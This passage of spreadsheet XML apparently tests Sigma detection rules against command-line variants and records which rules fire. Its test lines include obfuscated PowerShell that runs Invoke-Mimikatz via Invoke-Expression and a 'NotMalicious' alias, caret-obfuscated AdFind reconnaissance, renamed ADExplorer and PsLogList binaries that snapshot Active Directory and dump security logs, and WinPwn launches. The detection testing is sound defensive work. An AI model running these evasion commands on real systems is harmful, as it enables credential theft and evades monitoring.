          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1265" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1265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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1265" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1266" ht="15.75" customHeight="1" s="42">
      <c r="A1266" s="43" t="n"/>
      <c r="B1266" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1266" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1266" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1266" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1266" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1266" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1267" ht="15.75" customHeight="1" s="42">
      <c r="A1267" s="43" t="n"/>
      <c r="B1267" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1267" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1267" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1267" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1267" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1267" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1268" ht="15.75" customHeight="1" s="42">
      <c r="A1268" s="43" t="n"/>
      <c r="B1268" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1268" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1268" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1268" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1268" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1269" ht="15.75" customHeight="1" s="42">
      <c r="A1269" s="43" t="n"/>
      <c r="B1269" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1269" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1269" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1269" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I12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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1269" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1270" ht="15.75" customHeight="1" s="42">
      <c r="A1270" s="43" t="n"/>
      <c r="B1270" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1270" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1270" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1270" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127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70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1270" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1271" ht="15.75" customHeight="1" s="42">
      <c r="A1271" s="43" t="n"/>
      <c r="B1271" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1271" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1271" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1271" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127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71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1271" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1272" ht="15.75" customHeight="1" s="42">
      <c r="A1272" s="43" t="n"/>
      <c r="B1272" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1272" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1272" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1272" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1272" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1272" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I127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72" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1272" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1273" ht="15.75" customHeight="1" s="42">
      <c r="A1273" s="36" t="n"/>
      <c r="B1273" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1273" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1273" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1273" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127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73" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1273" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1274" ht="15.75" customHeight="1" s="42">
      <c r="A1274" s="36" t="n"/>
      <c r="B1274" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1274" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1274" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1274" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1274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274" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1274" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1275" ht="15.75" customHeight="1" s="42">
      <c r="A1275" s="36" t="n"/>
      <c r="B1275" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1275" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1275" s="36" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1275" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" adfind.exe d^o^m^a^i^n^l^i^s^t</t>
        </is>
      </c>
      <c r="F1275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1275" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution (9a132afa-654e-11eb-ae93-0242ac130002); Renamed AdFind Execution (df55196f-f105-44d3-a675-e9dfb6cc2f2b)</t>
        </is>
      </c>
      <c r="J1275" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1275" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1276" ht="15.75" customHeight="1" s="42">
      <c r="A1276" s="43" t="n"/>
      <c r="B1276" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1276" s="43" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1276" s="43" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1276" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1276" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1276" s="43" t="n"/>
      <c r="J1276" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1276" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1277" ht="15.75" customHeight="1" s="42">
      <c r="A1277" s="36" t="n"/>
      <c r="B1277" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1277" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1277" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1277" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1277" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1277" s="43" t="n"/>
      <c r="J1277" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1277" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1278" ht="15.75" customHeight="1" s="42">
      <c r="A1278" s="43" t="n"/>
      <c r="B1278" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1278" s="43" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1278" s="43" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1278" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1278" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1278" s="43" t="n"/>
      <c r="J1278" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1278" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1279" ht="15.75" customHeight="1" s="42">
      <c r="A1279" s="36" t="n"/>
      <c r="B1279" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1279" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1279" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1279" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1279" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1279" s="43" t="n"/>
      <c r="J1279" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1279" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1280" ht="15.75" customHeight="1" s="42">
      <c r="A1280" s="36" t="n"/>
      <c r="B1280" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1280" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1280" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1280" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1280" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1280" s="43" t="n"/>
      <c r="J1280" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1280" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1281" ht="15.75" customHeight="1" s="42">
      <c r="A1281" s="36" t="n"/>
      <c r="B1281" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1281" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1281" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1281" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1281" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1281" s="43" t="n"/>
      <c r="J1281" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1281" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1282" ht="15.75" customHeight="1" s="42">
      <c r="A1282" s="36" t="n"/>
      <c r="B1282" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1282" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1282" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1282" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\System32\advapi32.dll SomeFunction</t>
        </is>
      </c>
      <c r="F1282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1282" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1282" s="43" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702)</t>
        </is>
      </c>
      <c r="J1282" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1282" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1283" ht="15.75" customHeight="1" s="42">
      <c r="A1283" s="36" t="n"/>
      <c r="B1283" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1283" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1283" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1283" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1283" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1283" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1283" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1283" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1284" ht="15.75" customHeight="1" s="42">
      <c r="A1284" s="36" t="n"/>
      <c r="B1284" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1284" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1284" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1284" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1284" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1284" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1284" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1284" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1284" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1285" ht="15.75" customHeight="1" s="42">
      <c r="A1285" s="36" t="n"/>
      <c r="B1285" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1285" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1285" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1285" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -d 1 security</t>
        </is>
      </c>
      <c r="F1285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1285" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1285" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1285" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1285" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1285" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1286" ht="15.75" customHeight="1" s="42">
      <c r="A1286" s="36" t="n"/>
      <c r="B1286" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1286" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1286" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1286" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe /"d" 1 security</t>
        </is>
      </c>
      <c r="F1286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1286" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1286" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1286" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1286" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1286" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1287" ht="15.75" customHeight="1" s="42">
      <c r="A1287" s="36" t="n"/>
      <c r="B1287" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1287" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1287" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1287" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -"d" 1 security</t>
        </is>
      </c>
      <c r="F1287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1287" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1287" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1287" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1287" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1287" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1288" ht="15.75" customHeight="1" s="42">
      <c r="A1288" s="36" t="n"/>
      <c r="B1288" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1288" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1288" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1288" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -D 1 security</t>
        </is>
      </c>
      <c r="F1288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1288" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1288" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1288" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1288" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1288" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1289" ht="15.75" customHeight="1" s="42">
      <c r="A1289" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1289" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1289" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1289" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1289" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1289" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1289" s="43" t="n"/>
      <c r="J1289" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1289" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1290" ht="15.75" customHeight="1" s="42">
      <c r="A1290" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1290" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1290" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1290" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1290" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1290" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1290" s="43" t="n"/>
      <c r="J1290" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1290" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1291" ht="15.75" customHeight="1" s="42">
      <c r="A1291" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1291" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1291" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1291" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1291" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1291" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1291" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1291" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1291" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1292" ht="15.75" customHeight="1" s="42">
      <c r="A1292" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B1292" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
